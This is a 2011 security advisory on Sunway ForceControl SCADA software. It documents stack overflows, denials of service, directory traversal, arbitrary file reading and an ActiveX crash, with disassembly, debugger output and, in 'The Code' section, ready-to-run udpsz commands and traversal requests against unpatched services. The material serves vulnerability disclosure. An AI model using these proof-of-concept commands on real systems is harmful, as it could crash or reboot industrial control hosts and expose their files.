####################################################################### Luigi Auriemma Application: Sunway ForceControl http://www.sunwayland.com.cn/pro.asp Versions: <= 6.1 sp3 with AngelServer and WebServer updated Platforms: Windows Bugs: various stack overflows directory traversals third party ActiveX code execution various Denials of Service Exploitation: remote Date: 22 Sep 2011 Author: Luigi Auriemma e-mail: aluigi@xxxxxxxxxxxxx web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== ForceControl is a chinese SCADA/HMI software. ####################################################################### ======= 2) Bugs ======= ----------------------------- A] AngelServer stack overflow ----------------------------- Signed comparison in packet 8 of AngelServer that leads to a stack overflow: 004022E1 > B9 19000000 MOV ECX,19 004022E6 . 33C0 XOR EAX,EAX 004022E8 . 8D7C24 24 LEA EDI,DWORD PTR SS:[ESP+24] 004022EC . 83FE 64 CMP ESI,64 ; our value 004022EF . F3:AB REP STOS DWORD PTR ES:[EDI] 004022F1 . 0F8D E7000000 JGE AngelSer.004023DE ; signed 004022F7 . 8BCE MOV ECX,ESI 004022F9 . 8D75 0C LEA ESI,DWORD PTR SS:[EBP+C] 004022FC . 8BD1 MOV EDX,ECX 004022FE . 8D7C24 24 LEA EDI,DWORD PTR SS:[ESP+24] 00402302 . C1E9 02 SHR ECX,2 ; memcpy 00402305 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 00402307 . 8BCA MOV ECX,EDX 00402309 . 8D4424 24 LEA EAX,DWORD PTR SS:[ESP+24] 0040230D . 83E1 03 AND ECX,3 00402310 . 50 PUSH EAX 00402311 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 00402313 . 8B8C24 A0000000 MOV ECX,DWORD PTR SS:[ESP+A0] 0040231A . E8 A1FDFFFF CALL AngelSer.004020C0 0040231F . E9 BA000000 JMP AngelSer.004023DE -------------------------------- B] WebServer directory traversal -------------------------------- Through the usage of a 3-dots pattern it's possible to download the files located in the disk of the project used by WebServer. -------------------------------------------- C] various Denials of Service in AngelServer -------------------------------------------- The AngelServer program is affected by various problems that lead to Denial of Service effects: - exception handler due to unallocable memory through packet 6 - invalid memory read access during memcpy through packet 6 - whole system reboot through packet 6 - endless loop during the handling of the interfaces through packet 6 - whole system reboot through packet 7 ------------------------------------- D] third party ActiveX code execution ------------------------------------- This software is bundled with the "Cell Software"'s YRWXls.ocx ActiveX component (BD9E5104-2F20-4A9F-AB14-82D558FF374E version which is the latest) and it's affected by a vulnerability in the Login method: eax=886641aa ebx=02c55aac ecx=015ebd5c edx=886641ab esi=886641aa edi=015ebd88 eip=02c01db2 esp=015ebd10 ebp=02c867c0 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286 YRWXls!DllRegisterServer+0x2ab62: 02c01db2 8a08 mov cl,byte ptr [eax] ds:0023:886641aa=?? 0:008> gn (a1c.e00): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=6ed9b6fc edx=7c8285f6 esi=00000000 edi=00000000 eip=6ed9b6fc esp=015eb948 ebp=015eb968 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 6ed9b6fc ?? ??? No additional research has been performed on the vulnerability, anyway in my test it's necessary to load any other unsafe ActiveX component first (tested on Windows 2003). ------------------------------------- E] stack overflow in SNMP NetDBServer ------------------------------------- Stack overflow caused by the copying of data chunks in a stack buffer: 0040303A |. 66:8B40 0A MOV AX,WORD PTR DS:[EAX+A] ; chunks 0040303E |. 0FBFC0 MOVSX EAX,AX 00403041 |. 3BC7 CMP EAX,EDI 00403043 |. 0F8E AC000000 JLE SNMP_Net.004030F5 00403049 |. 894424 14 MOV DWORD PTR SS:[ESP+14],EAX 0040304D |> B9 10000000 /MOV ECX,10 00403052 |. 33C0 |XOR EAX,EAX 00403054 |. 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C] 00403058 |. 83C3 02 |ADD EBX,2 0040305B |. F3:AB |REP STOS DWORD PTR ES:[EDI] 0040305D |. 8B46 2C |MOV EAX,DWORD PTR DS:[ESI+2C] 00403060 |. 43 |INC EBX 00403061 |. 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C] 00403065 |. 66:8B6C18 FD |MOV BP,WORD PTR DS:[EAX+EBX-3] ; chunk num 0040306A |. 8A4C18 FF |MOV CL,BYTE PTR DS:[EAX+EBX-1] ; chunk size 0040306E |. 884C24 20 |MOV BYTE PTR SS:[ESP+20],CL 00403072 |. 8D3418 |LEA ESI,DWORD PTR DS:[EAX+EBX] 00403075 |. 8B5424 20 |MOV EDX,DWORD PTR SS:[ESP+20] 00403079 |. 81E2 FF000000 |AND EDX,0FF 0040307F |. 8BCA |MOV ECX,EDX 00403081 |. 03DA |ADD EBX,EDX ; concatenate 00403083 |. 8BC1 |MOV EAX,ECX 00403085 |. C1E9 02 |SHR ECX,2 ; memcpy 00403088 |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 0040308A |. 8BC8 |MOV ECX,EAX 0040308C |. 83E1 03 |AND ECX,3 0040308F |. F3:A4 |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] --------------------------------------------- F] integer stack overflow in SNMP NetDBServer --------------------------------------------- Signed 8 bit value expanded due to its sign and used in a memcpy over a stack buffer, note that also in this case the chunked data is concatenable so there is also this other way to exploit the overflow: 00402B78 |. 0FBE2C1A |MOVSX EBP,BYTE PTR DS:[EDX+EBX] ; 8bit expansion 00402B7C |. F3:AB |REP STOS DWORD PTR ES:[EDI] 00402B7E |. 8BCD |MOV ECX,EBP 00402B80 |. 43 |INC EBX 00402B81 |. 8BC1 |MOV EAX,ECX 00402B83 |. 8D7C24 20 |LEA EDI,DWORD PTR SS:[ESP+20] 00402B87 |. 8D341A |LEA ESI,DWORD PTR DS:[EDX+EBX] 00402B8A |. 03DD |ADD EBX,EBP ; concatenate 00402B8C |. C1E9 02 |SHR ECX,2 ; memcpy 00402B8F |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 00402B91 |. 8BC8 |MOV ECX,EAX 00402B93 |. 33C0 |XOR EAX,EAX 00402B95 |. 83E1 03 |AND ECX,3 00402B98 |. 43 |INC EBX 00402B99 |. F3:A4 |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ...and... 00402B9B |. 0FBE6C1A FF |MOVSX EBP,BYTE PTR DS:[EDX+EBX-1] 00402BA0 |. B9 10000000 |MOV ECX,10 00402BA5 |. 8D7C24 40 |LEA EDI,DWORD PTR SS:[ESP+40] 00402BA9 |. F3:AB |REP STOS DWORD PTR ES:[EDI] 00402BAB |. 8BCD |MOV ECX,EBP 00402BAD |. 8D341A |LEA ESI,DWORD PTR DS:[EDX+EBX] 00402BB0 |. 8BD1 |MOV EDX,ECX 00402BB2 |. 8D7C24 40 |LEA EDI,DWORD PTR SS:[ESP+40] 00402BB6 |. C1E9 02 |SHR ECX,2 00402BB9 |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 00402BBB |. 8BCA |MOV ECX,EDX 00402BBD |. 8D4424 40 |LEA EAX,DWORD PTR SS:[ESP+40] 00402BC1 |. 83E1 03 |AND ECX,3 00402BC4 |. 50 |PUSH EAX 00402BC5 |. F3:A4 |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ---------------------------------------- G] Denial of Service in SNMP NetDBServer ---------------------------------------- 00402A0A |> 8B4B 30 MOV ECX,DWORD PTR DS:[EBX+30] 00402A0D |. 83F9 0B CMP ECX,0B 00402A10 |. 7C 24 JL SHORT SNMP_Net.00402A36 00402A12 |. 8B5B 2C MOV EBX,DWORD PTR DS:[EBX+2C] 00402A15 |. 8B43 06 MOV EAX,DWORD PTR DS:[EBX+6] 00402A18 |. 3BC8 CMP ECX,EAX 00402A1A |. 7C 1A JL SHORT SNMP_Net.00402A36 ; signed comparison 00402A1C |. 8D5403 FE LEA EDX,DWORD PTR DS:[EBX+EAX-2] 00402A20 |. B9 A0704000 MOV ECX,SNMP_Net.004070A 00402A25 |. 5F POP EDI 00402A26 |. 5E POP ESI 00402A27 |. 66:8B02 MOV AX,WORD PTR DS:[EDX] ; invalid access --------------------------------------- H] Arbitrary files reading in NetServer --------------------------------------- Through this server it's possible to read any file on any disk or share. Opcodes 0x00 and 0x04 are used to open the file (the first one only adds the full project path to the name, so use directory traversal with it) while 0x02 is used to read and send its content with the possibility of specifying also the offset. Note that there is also a very limited heap overflow caused by some calculations performed on the offset where is possible to allocate a 0 bytes buffer for the reply packet but with only a Denial of Service effect. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip (version 0.3.3) A] udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400 B] http://SERVER/.../.../.../boot.ini C] udpsz -T -C "06000000 00000000 ffffffff" -b a SERVER 8800 0x400 udpsz -T -C "06000000 00000000 ffffff00" -b a SERVER 8800 0x400 udpsz -T -C "06000000 00000000 00040000" -b a SERVER 8800 0x400 udpsz -T -C "06000000 00000000 00040000" -c "2147483647," -b a SERVER 8800 0x400 udpsz -T -C "07000000 00000000 00000000" SERVER 8800 0x400 D] http://aluigi.org/poc/yrwxls_1.zip E] udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff F] udpsz -C "eb50eb50 5700 ffff0000 0100 ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff G] udpsz -C "eb50eb50 0000 80808080" -T SERVER 2001 0xb H] udpsz -D -1 -C "8888888888888888 00010000 01000000 04000000 633a5c626f6f742e696e69" 0 -C "8888888888888888 1c000000 01000000 02000000 00000000 ffffff7f" -1 -T SERVER 2006 0x11c ####################################################################### ====== 4) Fix ====== No fix. ####################################################################### --- Luigi Auriemma http://aluigi.org